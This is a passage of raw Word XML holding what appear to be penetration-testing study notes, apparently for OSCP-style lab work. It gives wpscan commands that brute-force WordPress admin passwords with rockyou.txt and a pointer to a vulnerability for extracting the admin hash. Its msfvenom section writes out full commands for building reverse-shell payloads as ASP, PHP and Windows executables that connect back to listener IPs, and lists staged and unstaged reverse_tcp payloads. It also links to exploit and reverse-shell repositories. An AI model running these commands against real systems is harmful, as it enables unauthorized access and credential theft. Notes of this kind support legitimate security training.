          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Remember to save your hosted file as .txt so it doesn’t get executed on your own end (this will give you a reverse shell to yourself)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9083B9" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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If the application is running as root, can you make the application run your code as root? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521A3A61" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E83D6" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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p-login exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20549876" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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pscan -u &lt;URL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869BA09" w14:textId="04CF39A0" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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pscan --url &lt;URL&gt; --wordlist &lt;rockyou.txt full path&gt; --username admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AAC586" w14:textId="77777777" w:rsidR="00807D2E" w:rsidRDefault="00F10B27" w:rsidP="00807D2E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10B27">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wpscan --url http://10.11.1.234 --wordlist /usr/share/wordlists/rockyou.txt --username admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44656FE7" w14:textId="1D6F3D6E" w:rsidR="00807D2E" w:rsidRPr="00807D2E" w:rsidRDefault="00807D2E" w:rsidP="00807D2E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D2E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00807D2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://10.11.1.251/wp/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00807D2E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -eu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F946CBE" w14:textId="01F81094" w:rsidR="00807D2E" w:rsidRDefault="00087892" w:rsidP="00807D2E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00807D2E" w:rsidRPr="00943625">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://cxsecurity.com/issue/WLB-2013020035</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00807D2E">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (use this vulnerability to find out admin hash password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12498F23" w14:textId="530AE07E" w:rsidR="00807D2E" w:rsidRDefault="00807D2E" w:rsidP="0087669F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1930776D" w14:textId="77777777" w:rsidR="0087669F" w:rsidRDefault="0087669F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB2ABB7" w14:textId="55FD0B26" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc533025673"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MSFVENOM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="2A728517" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7"/>
    <w:p w14:paraId="1CE1B873" w14:textId="77777777" w:rsidR="0088209C" w:rsidRDefault="0088209C" w:rsidP="0088209C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754105E5" w14:textId="418A76A9" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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msfvenom -p windows/shell_reverse_tcp  LHOST=&lt;Your IP&gt; LPORT=&lt;Your port&gt; -f asp &gt; shellBT.asp</w:t>
      </w:r>
      <w:r w:rsidR="00B55751">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Stageless)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C1C2C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21B919" w14:textId="079D69A0" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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msfvenom -p php/</w:t>
      </w:r>
      <w:r w:rsidR="00731BC8">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meter</w:t>
      </w:r>
      <w:r w:rsidR="00BD78D3">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>preter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">_reverse_tcp LHOST=&lt;Your IP&gt; LPORT=&lt;Your port&gt; -f raw &gt; shellBT.php </w:t>
      </w:r>
      <w:r w:rsidR="00B55751">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Stageless)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A97EFB" w14:textId="77777777" w:rsidR="0088209C" w:rsidRDefault="0088209C" w:rsidP="0088209C">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECAD973" w14:textId="77777777" w:rsidR="0088209C" w:rsidRDefault="0088209C" w:rsidP="0088209C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing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EXE (for windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7B176D" w14:textId="4CE43A44" w:rsidR="00F570DC" w:rsidRPr="00FE5A6B" w:rsidRDefault="00F570DC" w:rsidP="00F570DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5A6B">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.55 LPORT=443 -f exe &gt; shell.exe</w:t>
      </w:r>
      <w:r w:rsidR="007C3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C3A1F">
        <w:t>(Unstaged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54270572" w14:textId="63DF440C" w:rsidR="006B1C9D" w:rsidRDefault="00F570DC" w:rsidP="006B1C9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="002F46CC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe</w:t>
      </w:r>
      <w:r w:rsidR="007C3A1F">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C3A1F">
        <w:t>(Unstaged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF7CFE3" w14:textId="08475AE9" w:rsidR="006B1C9D" w:rsidRPr="00DC53DC" w:rsidRDefault="006B1C9D" w:rsidP="006B1C9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.86 LPORT=4445 -f exe &gt; </w:t>
      </w:r>
      <w:r w:rsidR="007C3A1F">
        <w:t>shell2.exe (Staged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A755D8D" w14:textId="77777777" w:rsidR="008F2EFA" w:rsidRDefault="008F2EFA" w:rsidP="008F2EFA">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02274AA3" w14:textId="23C36D64" w:rsidR="008F2EFA" w:rsidRPr="008F2EFA" w:rsidRDefault="008F2EFA" w:rsidP="008F2EFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr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tage payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B485193" w14:textId="5CF6D322" w:rsidR="008F2EFA" w:rsidRPr="002253E4" w:rsidRDefault="002253E4" w:rsidP="008F2EFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040EA555" w14:textId="301F07A1" w:rsidR="002253E4" w:rsidRDefault="002253E4" w:rsidP="008F2EFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002253E4">
        <w:t>linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidR="00B52660">
        <w:t xml:space="preserve"> (32 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A29065" w14:textId="654E019A" w:rsidR="002253E4" w:rsidRPr="002253E4" w:rsidRDefault="002253E4" w:rsidP="002253E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002253E4">
        <w:t>linux/x6</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002253E4">
        <w:t>/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558203A2" w14:textId="103668FA" w:rsidR="002253E4" w:rsidRPr="002253E4" w:rsidRDefault="008F2EFA" w:rsidP="008F2EFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr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Un</w:t>
      </w:r>
      <w:r w:rsidR="006956A7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>taged payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC4A39" w14:textId="77777777" w:rsidR="002253E4" w:rsidRPr="002253E4" w:rsidRDefault="002253E4" w:rsidP="002253E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F46CC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDCE67" w14:textId="01BF0B92" w:rsidR="002253E4" w:rsidRPr="002253E4" w:rsidRDefault="002253E4" w:rsidP="002253E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002253E4">
        <w:t>linux/x86</w:t>
      </w:r>
      <w:r>
        <w:t>/shell_reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidR="00B52660">
        <w:t xml:space="preserve"> (32 bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008A79E7" w14:textId="192B8C2D" w:rsidR="0088209C" w:rsidRPr="008F2EFA" w:rsidRDefault="002253E4" w:rsidP="002253E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/x64/shell_reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidR="0088209C" w:rsidRPr="008F2EFA">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C6CA40" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7"/>
    <w:p w14:paraId="1949CEBF" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc533025674"/>
      <w:r>
        <w:t>LINUX MISC COMMANDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="3F8D3287" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D84747" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing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&lt;command&gt; &amp;: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Makes the command run in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233274A" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F771A14" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67301CB9" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MISC GITHUB LINKS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCACC89" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidR="007351F7"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github.com/411Hall/JAWS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1569C0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidR="007351F7"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github.com/lukechilds/reverse-shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686DD9D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidR="007351F7"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github.com/abatchy17/WindowsExploits</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF0BB68" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidR="007351F7"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github.com/warner/magic-wormhole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345269C9" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidR="007351F7">
          <w:rPr>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://digitalforensicstips.com/2016/09/a-script-to-help-automate-windows-enumeration-for-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B1182A" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidR="007351F7"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sushant747.gitbooks.io/total-oscp-guide/content/port_forwarding_and_tunneling.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
